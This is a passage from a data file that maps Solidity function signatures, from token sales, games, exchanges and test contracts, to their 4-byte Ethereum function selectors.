"changeDna(uint256,uint256)": "0x5faf2880", "changeName(uint256,string)": "0xc39cbef1", "levelUp(uint256)": "0x0ce90ec2", "setLevelUpFee(uint256)": "0xccf670f8", "testMultitransfer3()": "0x24386b3e", "testMultitransfer2()": "0xb7a78911", "testMultitransfer1()": "0xd53bc605", "testRecurringClones()": "0xb3f1f31b", "testCanCloneAfterTransfer()": "0x49337227", "testCanTransfer()": "0xf661b886", "testCanClone()": "0x0bd38767", "testHasTokens()": "0xc9aa4cf8", "increment(uint256)": "0x7cf5dab0", "FermionToken()": "0xda17835f", "setNumbers(uint256)": "0x89fe8507", "getWords()": "0xdca7bcbe", "createHumanStandardToken(address[],uint256[],string,uint8,string)": "0x949b9e10", "isKilled()": "0x8fe8a101", "kill(bool)": "0x1e2c74f6", "Killable()": "0x89b13814", "VestedTokenMock(address,uint256)": "0x609bf323", "testTransferTokensUsingRawCall()": "0xc546a92e", "testTransferHandlesNegativeAmountRequest()": "0x30ccc891", "testTransferHandlesTooLargeRequest()": "0x3fd97621", "testTransferCorrectlySendsTokens()": "0x2f2bd5ac", "testDeployNewTokenWithTheTestContractAsOwner()": "0x77f9c101", "createController(address,address)": "0x70f5b71c", "createProxy(address)": "0x6140c54c", "holdTransaction(uint256,uint256,uint256)": "0xc8fdf67d", "performTransaction(address,bytes32)": "0x65b980ab", "createData(uint256,uint256)": "0x19c54359", "createSensor(uint256,uint256,uint256)": "0xde2037a7", "ManagerContract()": "0x9733dc79", "budgetAllocation()": "0x70279554", "ITDollar(uint256,string,uint8,string)": "0x39aa7599", "Found(uint8)": "0x3b6d2544", "addSubscription(address,bytes32,uint256)": "0xb6dc572f", "fundMe()": "0xb6a324e0", "majorEvent(bytes32,bytes,uint256)": "0x67f17405", "setStatus(bytes32)": "0x215a3bcc", "createMarriage(bytes32,bytes32,uint256,bytes32,bytes)": "0x794ee205", "SITExchangerMock(address,address,address)": "0xd17d0d29", "resolveDisputeBuyer(string,address)": "0xbf050334", "resolveDisputeSeller(string,address)": "0xe57ac748", "setDisputed(address,string)": "0xd818ecee", "setMarketplace(address)": "0x73ad6c2d", "getNamelessTouches()": "0x39ffd774", "getConstructorTouches()": "0x257793f9", "Pong()": "0x4d015fcc", "updateParameters(bytes32)": "0x2ac2af53", "_vestedDown(uint256,uint256,uint256,uint256)": "0x6b2ec90f", "slashDownRequest(uint256,address,uint256,bytes32)": "0x628b75bf", "slashPower(address,uint256,bytes32)": "0x15fb1a65", "_slashPower(address,uint256,bytes32)": "0x9729d040", "dilutePower(uint256,uint256)": "0x7a91d5f9", "setDowntime(uint256)": "0xbc5c0c67", "mainSaleDuration()": "0x24bb7734", "epm()": "0xa22e9009", "FirstLevelCost()": "0xffc4bbb3", "lotteryCount()": "0xc6f6d9d9", "myUsername()": "0x7999c7ca", "ck()": "0xf5c901db", "holdingToken()": "0xa1ad54e6", "totalObol()": "0x434afdfc", "PRE_SALE_BONUS_PERCENTAGE()": "0x8b036ee2", "getMyAccountBalance()": "0x769e86cd", "MilestoneAmountRaised()": "0xf726af40", "cooldown()": "0x787a08a6", "playerDayEthInLimit_()": "0xaefb658e", "supplyLockedB()": "0x8c21ffba", "isKnownOnly()": "0xe56f3815", "tankOut()": "0x3076e56a", "totalPurchaseValueInWei()": "0x2bbd84e8", "mainSaleDeadline()": "0x5a9c3ee4", "LastProposalID()": "0x3d18c615", "MULTISIG_ETH()": "0xbaa7d1f3", "reserveFundManager()": "0x03a3053b", "getCrydrViewStandardName()": "0x7c6fb02a", "VESTING_TIMES()": "0x12783f2f", "checkMilestoneStateInvestorVotedNoVotingEndedNo()": "0x7a72c30d", "m_multiOwnedRequired()": "0x787d64e4", "CRSAllocation()": "0x90f0dbd5", "pullFunds()": "0xe43a0bb2", "cobeneficiary()": "0x99e7cedf", "collectorWeiCollected()": "0x8e37c1e0", "winningNumbersPicked()": "0x36b09474", "accepted()": "0x67fe5a0c", "totalMintedToken()": "0x2898410b", "min_fundingGoal()": "0xd54604ae", "cashHistory()": "0xfe65bb65", "gifter()": "0x5f3f703c", "unitsLimitForCurrentSaleStage()": "0x0206deb5", "tokenGenerationLock()": "0xd8650f49", "fundingGoalHardCap()": "0xcbda1d85", "SELFDESTRUCT_DELAY()": "0xa461fc82", "preSeasonGame()": "0x911a9ac0", "tokenOwnerNumberMax()": "0xeed331f7", "totalBelaStaked()": "0x071da02f", "ADDR_MAYA_ORG()": "0x5897164a", "minEthToRaise()": "0x0efc9d03", "totalEthBankrollRecieved()": "0xcff76d67", "ETH_CRWDTOKEN()": "0xd87d2a66", "whiteListingAdmin()": "0xaac4e3a8", "Burnt_Token()": "0xfae73549", "WHITELIST_SUPPLIER()": "0xeb446ad8", "queen()": "0x9d856bdc", "BalanceNum()": "0xb2ad1993", "LEXToken()": "0x93a31509", "founderAllocation()": "0x824338bd", "ADVISOR_FOUR()": "0xd944c749", "totalAmountOfTeatokensCreated()": "0xbcde87eb", "preTgeCap()": "0x984274af", "totalTokensAvailableForSale()": "0x7fa400e4", "publicTokenCap()": "0x62ce071c", "bonusAddress()": "0xa381de54", "nAuditors()": "0x532c3dc5", "PRIVATE_SALE_TOTAL()": "0xea43b069", "oracle_address()": "0x7e0c1792", "PRESALE_ETH_IN_WEI_FUND_MAX()": "0xbf70a985", "distributionFixed()": "0x17dec7af", "mustHoldFor()": "0xe5791c3e", "date610()": "0x48ed3e00", "EMISSION_FOR_SALESTAGE2()": "0xca313539", "end1Timestamp()": "0xe29f610d", "transferFeeNum()": "0x32d68fd5", "vote01NoCount()": "0x62a974b6", "issueDividendRewardBips()": "0x5c4271c9", "MTP_PER_ETH_SALE()": "0x3fdde728", "createdTimestamp()": "0x10309781", "escrowTokensWallet()": "0x746178ed", "Bailout()": "0x43acd7bc", "PRICE()": "0x8d859f3e", "ALLOC_RESERVED()": "0x41595f04", "currentGameId()": "0x536a3ddc", "jackpotMedium()": "0xdd5e8410", "guardian3()": "0xf006228c", "bountyDistributed()": "0xe7ff0e38", "maxCapReached()": "0xc7ff1b60", "minMinutesPeriods()": "0x71bf35b6", "mainSaleBonusEndTime()": "0x4e2ad943", "preIcoLimit()": "0x24f2cc02", "MyKidsEducationFund()": "0x9a0846f1", "chooseWinnerDeadline()": "0xe409edf1", "COMMUNITY_POOL()": "0xaeb47e2a", "TOTAL_TOKENs_SUPPLY()": "0x000c12af", "dividendDivisor()": "0x20b431aa", "distributionComplete()": "0x23dbf825", "requiredPrefix()": "0x1d3a5dbe", "VREO_SALE_PHASE_1_END_TIME()": "0x1458ffb3", "iown()": "0x8e0bba69", "charityCut()": "0x186e4297", "maxParticipants()": "0x24924bf7", "secondsPerPeriod()": "0x407f8001", "addressBounty()": "0x6ae76777", "PreSaleCloseTime()": "0x52cd972d", "SPINFund()": "0x54659d99", "auther_user()": "0xb63a61d3", "PRIVATESALE_BASE_PRICE_IN_WEI()": "0x1a11415e", "futureSaleAllocation()": "0xe454158c", "preSaleThirdCap()": "0xdf506801", "COMMUNITY_POOL_ADDR()": "0xbdf5fba1", "COOLDOWN_PERIOD()": "0x6e99d52f", "mintTotal()": "0xbca63e50", "mileagePointPrice()": "0xad317c23", "periodOne()": "0xf67a7782", "pre_sale_end()": "0x9c04e4e7", "isPauseSave()": "0x7878b66a", "currentSquirrelOwner()": "0xf56e8421", "MAX_INVESTMENTS_BEFORE_MULTISIG_CHANGE()": "0x6203f09f", "crowdsale_end()": "0x01c516b1", "BLACKCOIS()": "0x1e6c3d0e", "minPaymentForAnswer()": "0x7efc2315", "destroyThreshold()": "0x93b21c8c", "getVlsTokenAddress()": "0x13a91cc8", "preSaleStarted()": "0x690cf0d1", "KIK_ADDRESS()": "0xe4b1443b", "isLotteryOpen()": "0xcabc0f43", "time1()": "0x4a3bd672", "COMM_ADDR()": "0x90eede26", "devTeamPrecent()": "0x14d20606", "nextRoundDonation()": "0x56b7538b", "betFeePerMil()": "0x09cb22d5", "RTB2()": "0xe87ed8b5", "totalBountySupply()": "0x9a9d0935", "crowdSaleClosed()": "0x77b1da93", "INTERFACE()": "0x32e30e84", "spentFunds()": "0x1142d47f", "shop()": "0x0881fa0d", "TEAM_SHARE_PERCENTAGE()": "0x01b74d73", "TOKEN_SALE2()": "0x1b8b4787", "starterPackCardLevel()": "0x2ed73df6", "maxAirdropParticipants()": "0xc1932833", "district0xNetworkToken()": "0xe6c22a11", "hundredKInvestor()": "0x91f02379", "getCurrentRateInCents()": "0x8936b8d4", "proportion()": "0x5b4246d4", "STAGE_3_FINISH()": "0x0c4a8d94", "otherchainstotalset()": "0x1a1773f4", "privateCap()": "0xd85e5486", "FOURTH_USER_CUT()": "0xbd85e163", "poolStartDate()": "0xee1df50d", "bidFeePercents()": "0x362a36b4", "isContractExpired()": "0xea8b5ca3", "registrationDeposit()": "0x31606828", "exec_admin()": "0xa8006dfe", "privateIcoMax()": "0x836cca1d", "payoutIndex()": "0x2df05a3e", "CHUNK_SIZE()": "0xe91e13a9", "receivedTotal()": "0x16713b37", "lastBlock_f12Hash_uint256()": "0x3e4d914e", "restrictUntil()": "0xa077321c", "ntsDepositAddress()": "0x2e3edd0f", "mineth()": "0xafb688a2", "minEtherContrib()": "0xc11d9d9f", "DirectInput()": "0x5d4dda72", "withdrawWei()": "0x5211ac2e", "pendingEtherForCroupier()": "0xd77e2f55", "stage2StartTime()": "0x9a862c2d", "erc20Contract()": "0xa8f6c913", "volume()": "0xc618a1e4", "token10MstepCAP()": "0xb12673b2", "coinIssuedMkt()": "0x674a62d0", "capToken()": "0xb4f666da", "windowBonusMin()": "0xc4305a55", "finaliseTime()": "0xb556188e", "MICRO_DOLLARS_PER_BNTY_PRESALE()": "0x219a6ead", "getCrowdsaleTokens()": "0x65e83ae1", "lawEnforcementRole()": "0xa6ca54bd", "presaleEnded()": "0xe580b2b0", "presaleOwner()": "0x9c89a10a", "returnPtSafeXLarge()": "0xbb996043", "r2VaultAddr()": "0x43b812ef", "unsoldAddr()": "0xcb50301a", "lockReleaseDate1year()": "0x75df1fe8", "getThirdAdmin()": "0xdaf161e2", "lastrecordindex()": "0x1459ecc4", "bitwordsCutOutof100()": "0xc559c395", "distributionAddress()": "0x37fb7e21", "totalBonusGiven()": "0x999d350d", "EtherLiteSupply()": "0xd0237ab8", "anyAssetHasChanges()": "0x57945e3e", "organizer5()": "0xa93fd5f1", "gameMiningTokenCap()": "0x7bdef3f8", "WHITELIST_END_DATE()": "0x6855ded3", "minSuccess()": "0x9cb78df8", "blocksInFirstCapPeriod()": "0xc12ae5e9", "totSupply()": "0x81fbf0a5", "shippingService()": "0xe89df228", "tokenR0()": "0x5f84d0f9", "advisersTokenTimelock()": "0x27687d34", "hour()": "0x23e5f1c5", "TOKEN_THIRD_DISCOUNT_MULTIPLIER()": "0xc5fc98c9", "patentSaleTimeDelay()": "0xd1dfdc07", "CROWD_WAVE2_PERIOD()": "0x8b0c7f67", "getInviteInfo()": "0xe175c86a", "icoAccount()": "0xb6ddcd14", "stringFloatToUnsigned(string)": "0x9153d09a", "calcBonus(uint256,uint256)": "0x8b0133d5", "stopPrivateSale()": "0x4e088eb7", "Mindmap_Token(uint256,address)": "0x993d29fc", "CrowdsaleLimit(uint256,uint256)": "0x05862611", "PublicBatchTransfer(address,uint256)": "0x1fbeaa83", "setKeepEth(bool)": "0xac19c726", "withdrawEth2Wallet(uint256)": "0x7a8e3d8d", "WHP()": "0x89320239", "setReleaseAmountToCreator(uint256)": "0x89e2605d", "Etheroneum()": "0x156cacc3", "killThisContract()": "0xf81bfa3f", "PSTBCoin()": "0x44eccf16", "Random()": "0x604a6fa9", "toAsciiString()": "0x76be166c", "substring(string,uint256,uint256,uint256,uint256)": "0xec15c6ba", "ArJoust(uint256,uint256)": "0x0e94869e", "ApushJoustUser(address,address)": "0xb90a4df1", "UBCoin()": "0x5dbc374f", "Exhibition()": "0x53790097", "TokenTWL(uint256,string,string)": "0x8168b41e", "sacToken(uint256,string,string)": "0xbeafa2dc", "melt(address,uint256)": "0x8f8d322e", "appointNewCFO(address)": "0x519f9590", "postMessage(address,uint256,string)": "0x25dccaf9", "allowMint(address,uint256)": "0x26e97fce", "registerWallet(address)": "0x779beedf", "HappyEnding()": "0xaa91d5c5", "fillOrder(address,address,address,address,uint256,uint256,uint256,uint256,uint256,uint256,bytes,bytes,uint256,bytes)": "0x94704818", "matchOrders(address,address,address,address,uint256,uint256,uint256,uint256,uint256,uint256,bytes,bytes,address,address,address,address,uint256,uint256,uint256,uint256,uint256,uint256,bytes,bytes,bytes,bytes)": "0x9281e270", "VERSION()": "0xffa1ad74", "currentContextAddress()": "0xeea086ba", "marketBuyOrders(uint256,bytes[])": "0xd6efc8eb", "EIP712_DOMAIN_HASH()": "0xe306f779", "marketSellOrdersNoThrow(uint256,bytes[])": "0xbd9ebfbb", "orderEpoch(address,address)": "0xd9bfa73e", "getOrderInfo()": "0x01efb6c8", "executeTransaction(uint256,address,bytes,bytes)": "0xbfc8bfce", "fillOrder(uint256,bytes)": "0x0f191524", "marketBuyOrdersNoThrow(uint256,bytes[])": "0x915db230", "registerAssetProxy(bytes4,address,address)": "0x833abf3a", "preSigned(bytes32,address)": "0x82c174d0", "marketSellOrders(uint256,bytes[])": "0xaf422cce", "allowedValidators(address,address)": "0x7b8e3514", "setSignatureValidatorApproval(address,bool)": "0x77fcce68", "fillOrKillOrder(uint256,bytes)": "0x0aa9c58b", "getAssetProxy(bytes4)": "0x60704108", "batchFillOrdersNoThrow(uint256[],bytes[])": "0x038f8b64", "cancelOrdersUpTo(uint256)": "0x4f9559b1", "batchFillOrKillOrders(uint256[],bytes[])": "0x00fe4789", "batchCancelOrders()": "0xfefa69a0", "assetProxies(bytes4)": "0x3fd3c997", "fillOrderNoThrow(uint256,bytes)": "0x35f82876", "matchOrders(bytes,bytes)": "0x23be45e2", "preSign(bytes32,address,bytes)": "0x3683ef8e", "cancelled(bytes32)": "0x2ac12622", "batchFillOrders(uint256[],bytes[])": "0xbd129b92", "EIP712_DOMAIN_SEPARATOR_SCHEMA_HASH()": "0x2624b2d9", "exploitMe(bytes8)": "0xeb496a80", "getNewInstance()": "0xcb3eecc9", "getNewInstance(address)": "0x21df2ea5", "LisaToken()": "0x4aeb0241", "Carpati()": "0xa32508a1", "getStoriesLength()": "0x9d210bdd", "addStory(uint256,string)": "0xc4cc5616", "ProsperToken()": "0xc772173a", "BullToken()": "0x9f9936e7", "currentCancellationResults()": "0x1d846f5c", "cancelVote(uint8)": "0x5a1e0a46", "getProposalFunds(uint256)": "0x50e706fb", "proposalResult(uint256)": "0x1022b30b", "currentProposalResults(uint256)": "0x1fa96b96", "vote(uint256,uint8)": "0x943e8216", "getReport(uint256,uint256)": "0xbe87bcfc", "getReportsCounter(uint256)": "0x264faeb8", "addReport(uint256,string,string)": "0xba8747b3", "getOverview(uint256,uint256)": "0xcf58802f", "getOverviewsCounter(uint256)": "0xd98b2fbf", "addOverview(uint256,string,string)": "0x77fed1c7", "addProposal(string,uint256,uint256,string,string)": "0x7a9a032d", "checkProposalExistence(string)": "0xd30a1325", "SlidebitsTestToken(string,string)": "0x7c0f884b", "convertMainchain(string,string)": "0xf0c388c7", "deleteAllMessages(address)": "0x303bef74", "NLToken()": "0xea2da598", "LeekCoinCrowdsale(uint256,uint256,address,address)": "0x11fa3d14", "test(uint256[5])": "0xb7133fa9", "doesContractImplementInterface(address,bytes4)": "0xe9c54384", "tokensReceived(address,address,uint256)": "0x29e9a3b9", "Hopecoin()": "0xd60fd1be", "test2(uint256)": "0xcaf44683", "store(string)": "0x131a0680", "retrieve(string)": "0x64cc7327", "ItsComingHomeToken()": "0x2e84e8ca", "CIVCoin()": "0x9924ab31", "LandmarkCoin()": "0x7315af6f", "IsRazRunning(uint256)": "0x1fca5fda", "bitswift()": "0xb6725bcf", "GCPrightToken()": "0x1909d314", "tryAnotherOne()": "0xa1931ff9", "LucksToken()": "0xca27b214", "deposite()": "0xa50ec326", "BeteventCrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0xaeae264b", "returnsenderbalance()": "0xbaa92a05", "executeAfterFinalize(bytes)": "0x89c5ee3b", "_preValidateCancellation()": "0xdb00d1a9", "_preValidateFinalization()": "0x7eb52145", "_preValidateInvest(address,uint256)": "0x1512cfc1", "_transferTokens(address,uint256)": "0x177dcde9", "_getInvestorTokenAmount(address)": "0xb80a30b7", "_getRewardTokenAmount()": "0x9bfeda53", "_withdrawOwnerTokens()": "0x62251182", "_withdrawInvestorTokens(address)": "0x2d78b7fc", "setInvestmentAddress(address)": "0x9d2fcb8c", "batchTransferORSB(address[],uint256)": "0xa0a4d9df", "removeAddressesFromRole(address[],string)": "0x6ac96df8", "removeAddressFromRole(address,string)": "0x2ac025ab", "addAddressesToRole(address[],string)": "0x574c8776", "isAccess(address,string)": "0x88e67d96", "addAddressToRole(address,string)": "0x9b71a7c9", "NKCToken()": "0x576bc138", "withdrawERC20Tokens(address,address,address,uint256)": "0x4363e888", "updateMsgSenderBonusDrops(uint256)": "0xe5656f9c", "multiValueAirdrop(address,address,address[],uint256[])": "0xa5b70519", "singleValueAirdrop(address,address,address[],uint256)": "0x0c5532bf", "issueRefunds(address[])": "0x528976de", "getTokenAllowance(address,address,address)": "0x94b31fbd", "unbanToken(address)": "0xf332a245", "banToken(address)": "0x18fe1a8d", "getEthBalanceOf(address)": "0xb28fc973", "getTotalDropsOf(address)": "0x4f95e960", "getBonusDropsOf(address)": "0xa3792985", "getDropsOf(address)": "0x71f124c5", "revokeBonusCreditOf(address,uint256)": "0xc44412e3", "grantBonusDrops(address,uint256)": "0x2a501a43", "setMaxDrops(uint256)": "0xeb1cfa82", "getMaxDropsPerTx()": "0x3f92edaf", "getRemainingTrialDrops(address,address)": "0xddcd3681", "tokenHasFreeTrial(address,address)": "0x23b5b257", "DappleAirdrops()": "0x7a1c44f8", "confirm(address,uint256)": "0xd7ca01b5", "sendReward(address,address,uint256)": "0x6b1af75e", "transferTokenAddress(address)": "0x4ed4d42a", "GlavCryptPoint()": "0xc4b2a668", "wtech2()": "0x12711ae3", "recyclingRemainToken()": "0x685d1135", "updateContractTokenBalance()": "0xe8125eb9", "unterminateFunding()": "0x785da817", "terminateFunding()": "0x9c0b7c08", "unapproveDisbursement()": "0x4ff45d73", "approveDisbursement()": "0x25b634c0", "setDisbursementEndTime(uint256)": "0x620eb8ee", "requestDisbursement(uint256)": "0x8dc889f6", "setObjectionPercent(uint256)": "0x24aa62fe", "setConsensusPercent(uint256)": "0x239f29dd", "_setCurrentRate(uint256)": "0xbc5213b7", "_calculateCurrentRate()": "0x0f420113", "getCurrentBonusPercentage()": "0x1f0b2561", "getCurrentTokenPriceInCents()": "0xc68eebe3", "getPhaseNumber()": "0xf7286888", "setFiatContract(address)": "0x2b3ed526", "confirmReference(address,uint256,uint256)": "0x5caaa536", "transferToSimpleService(address,uint32,uint256,uint256,uint256)": "0x2527331b", "removeService(address,uint32)": "0xa6fe7a28", "changeServiceReceiptAddress(uint32,address)": "0x27ccdd0a", "updateServiceTokensPerCredit(address,uint32,uint256)": "0xcd43def3", "updateServiceDescription(address,uint32,string)": "0x274fadf6", "getServiceUpdateAddresses(address,uint32)": "0x47356dd8", "getServiceInformation(address,uint32)": "0x2c6fa230", "isServiceRemoved(address,uint32)": "0x343dbeb6", "getRemovedServicesForApplication(address)": "0x28f22cc1", "getServicesForApplication(address)": "0x59b112d8", "listSimpleService(uint32,string,uint256,address[],address)": "0x18e9e7ab", "releaseOperation()": "0xf8c28ce0", "isAgent(address)": "0x1ffbb064", "amIAgent()": "0x332ea814", "resetAgent(address)": "0x04b70576", "_burnTokens(address,uint256)": "0xc9c7cb74", "optionDescription(uint256)": "0xd999f132", "availableOptions()": "0x79ed13a7", "issueDescription()": "0xb9e16b65", "PotatoToken()": "0x60e39f73", "TOKENOMICX()": "0x30ba040a", "FREETOKENTEST(uint256,uint256)": "0x154f78dc", "transferHomeViaRelay(address,uint256,uint256)": "0x7592550b", "ForeignBridge(uint256,address[],uint256)": "0x129cf7cb", "withdraw(uint8[],bytes32[],bytes32[],bytes)": "0x9ce318f6", "HomeBridge(uint256,address[],uint256,uint256,uint256)": "0x2a5c0e7c", "getHomeGasPrice(bytes)": "0x50e78690", "hasEnoughValidSignatures(bytes,uint8[],bytes32[],bytes32[],address[],uint256)": "0xaa30b7e3", "updateRank(bytes32,bytes32,uint256,bytes32,uint256)": "0x816c66c9", "AKTestEther(address,address,address,uint256,uint256,uint256)": "0xb6d33511", "payTransactionFee(uint256)": "0xa15454ba", "storeTransactionData(address,address,uint256,uint256)": "0xca0c9b5c", "interSendWithOtherEvent(address,uint256)": "0x51114b24", "interSend(address,uint256)": "0xd687b57e", "GG()": "0x60d975c9", "tokensLocked(address,uint256)": "0xfa7f6b96", "finishLock()": "0x97f3016b", "lock(address,address,uint256[],uint256[])": "0xa6c226f0", "FATRANSOM()": "0x406a1180", "userAccountTokenBalances(address)": "0x0f82b42f", "buyCore(address,uint256)": "0xb27c4b92", "buyName(string)": "0x3128d1be", "WumingToken(address,address)": "0xa6f87bc6", "BancorBuy()": "0xf743d334", "Rotharium()": "0x05ddd49f", "eastadsCREDITS()": "0xd47c9e11", "IndoAset()": "0x7d18a197", "RaiSed()": "0xfb9bbeaf", "collectOtherTokens(address)": "0x64e2ec50", "collectBack3()": "0xd0bcebc8", "collectBack2()": "0x53aaa63f", "modifyCollectorAddress(address)": "0x19583b05", "AirDropContract(address,address)": "0xd2b10b75", "off()": "0x6626b26d", "on()": "0x67b7c034", "emergency(uint256,address)": "0x08b407da", "getGameMaker()": "0x561f39c0", "ArcBlockToken()": "0xa0c07002", "EdwanzToken()": "0x512d8a87", "addlockAccount(address,uint256,uint256)": "0x8b1f3206", "transferSingle(address,address,uint256)": "0x7317a88d", "TestEOSCoin()": "0xfb1ce13a", "remainingBalance()": "0xda25de3c", "ANTDToken()": "0x18764471", "TestXRPCoin()": "0xf9fb12ad", "getOrderAllocatedToFundPool(uint256)": "0x61fd718f", "getOrderPriceTotal(uint256)": "0x36ee83f9", "getOrderTokenAllocationStatus(uint256)": "0x5968c2a4", "fundsReceived(uint256)": "0xdc53903b", "newOrder(address,address,string,string,uint256,uint256,uint256)": "0x345b3d3a", "totalOrders()": "0x1d834409", "setCommunityPool(address)": "0x410a1db1", "TSToken()": "0x26f3ceaf", "placeCube(uint256,uint256,uint256,uint256,uint256)": "0xf4784b37", "increaseWorldLimit(uint256,uint256,uint256)": "0xc2c8fd40", "dariatest()": "0x947cbc1e", "TalosToken()": "0xe00d0aed", "transferMoney(address)": "0x86ce9835", "returnSenderBalance()": "0x545f6837", "returnSender()": "0x5170a9d0", "returnrandom()": "0x1375111e", "HedglyStakingToken()": "0x6e064f6a", "Enumivo()": "0x26fa9082", "repairCar(bytes17,string,string,uint256)": "0xe34f947d", "verifyService(address)": "0x949319b1", "newService(string,string)": "0x6bc3b437", "newCar(string,bytes17)": "0xcff13efb", "createManufacturer(address,address,string,string)": "0x350cf91c", "isServiceAddress()": "0x8f140568", "isManufacturerAddress()": "0xba622884", "isContractOwner()": "0x7f7dcdbf", "KKday()": "0x4180b70d", "Sensor()": "0x610bbebd", "multiSendEth(uint256,address[])": "0x8e3d63e3", "Tropycoin()": "0x120fe731", "Ethex(address,address,uint256,uint256,address,uint256)": "0xbe9fa8dc", "CBToken()": "0x014c8ac0", "safeAdd(uint256,uint256,uint256,uint256)": "0x7b54a994", "getHeroLevel(address,address)": "0xce48a54d", "setSkillPointCost(uint256)": "0x163fa64a", "getRandomValue(uint256)": "0x25e41da1", "setBaseStamina(uint256)": "0x1d048136", "setBaseStrength(uint256)": "0x66816e2a", "setBasePoints(uint256)": "0xc33e40a3", "finishBattle(uint256,address,address)": "0x80e1b9c4", "getChance(uint256,uint256)": "0xd2004f8c", "joinBattle(uint256)": "0x4a042f0d", "createBattle(uint256)": "0x94d44f12", "arrangeFreePoints(uint256,uint256,uint256,uint256)": "0x012ea37c", "createHero(string,uint256,uint256,uint256,uint256)": "0x6db3a788", "PermarektToken()": "0x1240b381", "danGold()": "0x8e9a5890", "payTo(address[])": "0xe850a8ef", "transferTo(address,address[],uint256)": "0xcf2887e5", "Exploit(address)": "0x270f9359", "viewSecondLotOfContractState()": "0xf2114752", "viewFirstLotOfContractState()": "0xb72179ff", "MXY_chain()": "0x73d3172e", "AntitiredToken(uint256,string,uint8,string)": "0x709bc0ff", "WorldStage()": "0x233e5d00", "bluceTestCoin(uint256,string,string)": "0x25981559", "TravelShare()": "0x056129a6", "DCSToken()": "0xcbba3f4b", "rushitesticoToken()": "0xa588a968", "trivenewstestToken()": "0xb3935caa", "loikikdidad()": "0x5adcf475", "olumla()": "0xfd52b3cd", "setIsBatch(bool)": "0xa875b2ed", "batchTrasferByValue(address[],uint256[])": "0x5bdcc165", "batchTrasfer(address[],uint256,uint256)": "0xc45a4047", "auctionList()": "0x1cc2502e", "newAuction(uint256,uint256)": "0x9645bae5", "escrowList()": "0x5184c96d", "close(uint256)": "0x0aebeb4e", "newEscrow(uint256)": "0xd5fa2da5", "getCmasByOwner(address)": "0x3d856c9b", "newCmas(uint256,string)": "0xafe80b8d", "TBSTK1()": "0x09ad8eef", "place_buy_order(uint16,string,address,string,string)": "0xd29e2746", "get_remaining_quantity()": "0x1d25c1a5", "get_total_quantity()": "0x96a1e85c", "get_description_hash()": "0x039fb41c", "get_location()": "0xe62c2f9c", "get_description_url()": "0x2e63dc80", "OpenRetailContract(uint16,bytes32,string,string)": "0xc1aa104e", "FinalizableCrowdsaleImpl(uint256,uint256,uint256,address)": "0x663890b1", "sui()": "0xc421249a", "setme()": "0x224f143a", "burnNotDistrTokens(uint256)": "0x97d33c33", "limitAccount(address,uint256)": "0x0701da46", "irreducibleOf(address)": "0x9f94d684", "mintedTokens()": "0x8d75fe05", "activeTokens()": "0xc47ef875", "queryCredit(address)": "0x59f1286d", "send_to_darshil()": "0xbf31d573", "testJoin()": "0x138665ff", "testConcat()": "0x21b55c42", "testContains()": "0xd01e2df9", "testCount()": "0x9590d4b9", "testRsplit()": "0xdb38b877", "testSplit()": "0xed190746", "testRfind()": "0xdfc119b0", "testFind()": "0xa973e27c", "testUntil()": "0xacd6a40a", "testEndsWith()": "0x46c068c3", "testBeyond()": "0x5342da41", "testStartsWith()": "0x9de39cb3", "testCompare()": "0x809a6173", "testOrd()": "0x6739fc52", "testNextRune()": "0xe74cd692", "testEquals()": "0xc80094b3", "testEmpty()": "0x2db6ad32", "testLen()": "0xd73cbc6b", "testCopy()": "0xca56106c", "testToSliceB32()": "0x0e69d16b", "testBytes32Len()": "0xaa202aca", "testSliceToString()": "0xbfcf0baf", "addAmbassador(address)": "0x295c25d5", "updateEndTime(uint256)": "0x6ab3846b", "updateUpdater(address)": "0x637af51c", "updateValue(uint256)": "0x573c0bd3", "CoinCrowdICO(address,uint256,uint256)": "0x76305a89", "numPurchasesOf(address)": "0xa415833b", "ambassadorsNumber()": "0x72a86693", "donate(uint256)": "0xf14faf6f", "Donator3()": "0xbe4413fc", "WinikToken()": "0x6e50640c", "CappedCrowdsaleImpl(uint256,uint256,uint256,address,uint256)": "0xbc899015", "evaluateProposalMetricEnd(uint256)": "0xf6560449", "evaluateProposalAction(uint256)": "0x5db8e202", "evaluateProposalMetricStart(uint256)": "0x6c047c36", "evaluateProposalPreCondition(uint256)": "0xe97a4779", "evaluateProposalMarket(uint256)": "0x46ab3d5e", "Futarchy()": "0x08df8602", "getCreator()": "0x0ee2cb10", "MyKillerContract()": "0x8c7d1e8a", "explore2(uint256,address,bool)": "0xd8e1b9ba", "explore(uint256,address,bool)": "0xebb5f11c", "remove(address,uint256)": "0xabe7f1ab", "add(address,uint256)": "0xf5d82b6b", "enable_exploration()": "0x0cf044ee", "Coverage()": "0x2419ef4d", "test_transfer_token_to_contract()": "0x1366b970", "receiveToken(address,uint256,address)": "0xaebd3f96", "freezeOf(address)": "0xcd4217c1", "unfreeze(uint256)": "0x6623fc46", "Aeron()": "0x0c861d4b", "setVersion(string)": "0x788bc78c", "startDispute(address)": "0x278ab692", "myFirstHelloWorld()": "0xa00d7b27", "getTotalTheoreticalSupply()": "0x238d3590", "getTotalMigrated()": "0x91d76bbb", "mintForReportingParticipant(int256,uint256)": "0x866b9323", "trustedReportingParticipantTransfer(address,address,uint256)": "0xb873e9a7", "mintForDisputeCrowdsourcer(int256,uint256)": "0x448a5e11", "migrateFromLegacyReputationToken()": "0x75d9aa1a", "trustedUniverseTransfer(address,address,uint256)": "0xfe98184d", "trustedFeeWindowTransfer(address,address,uint256)": "0x90fbf84e", "trustedMarketTransfer(address,address,uint256)": "0xf22b258a", "getMigrateInBonusIfInForkWindowValue()": "0x6c6b298a", "getMigrateInAttoTokensValue()": "0x767c9d18", "getMigrateInReporterValue()": "0xeab27a7c", "getMigrateOutAttoTokens()": "0x872dd49b", "getMigrateOutReporterValue()": "0x95b505f0", "getMigrateOutDestinationValue()": "0xcfd28966", "getTrustedTransferAttotokensValue()": "0xa16383e2", "getTrustedTransferDestinationValue()": "0x44036c41", "getTrustedTransferSourceValue()": "0x4d4b3202", "setInitializeUniverseValue()": "0xdf3959f5", "setMigrateFromLegacyReputationToken(bool)": "0x973e315b", "setTrustedTransfer(bool)": "0x9beebe20", "setMigrateIn(bool)": "0x8aabb56f", "setMigrateOut(bool)": "0x210dee2f", "getProduct(string)": "0x68111cce", "getRequestCount()": "0x3fad1834", "getClaim(uint256)": "0x5aef2447", "getClaimCount()": "0xba4611d9", "getCustomer(string)": "0x518bddd9", "startOraclize(uint256)": "0x8ece39cd", "findTenAmUtc(uint256)": "0xa196593c", "requestRemainingTokens()": "0x526e4d79", "sendTokensManually(address,address,uint256)": "0x9c6e199a", 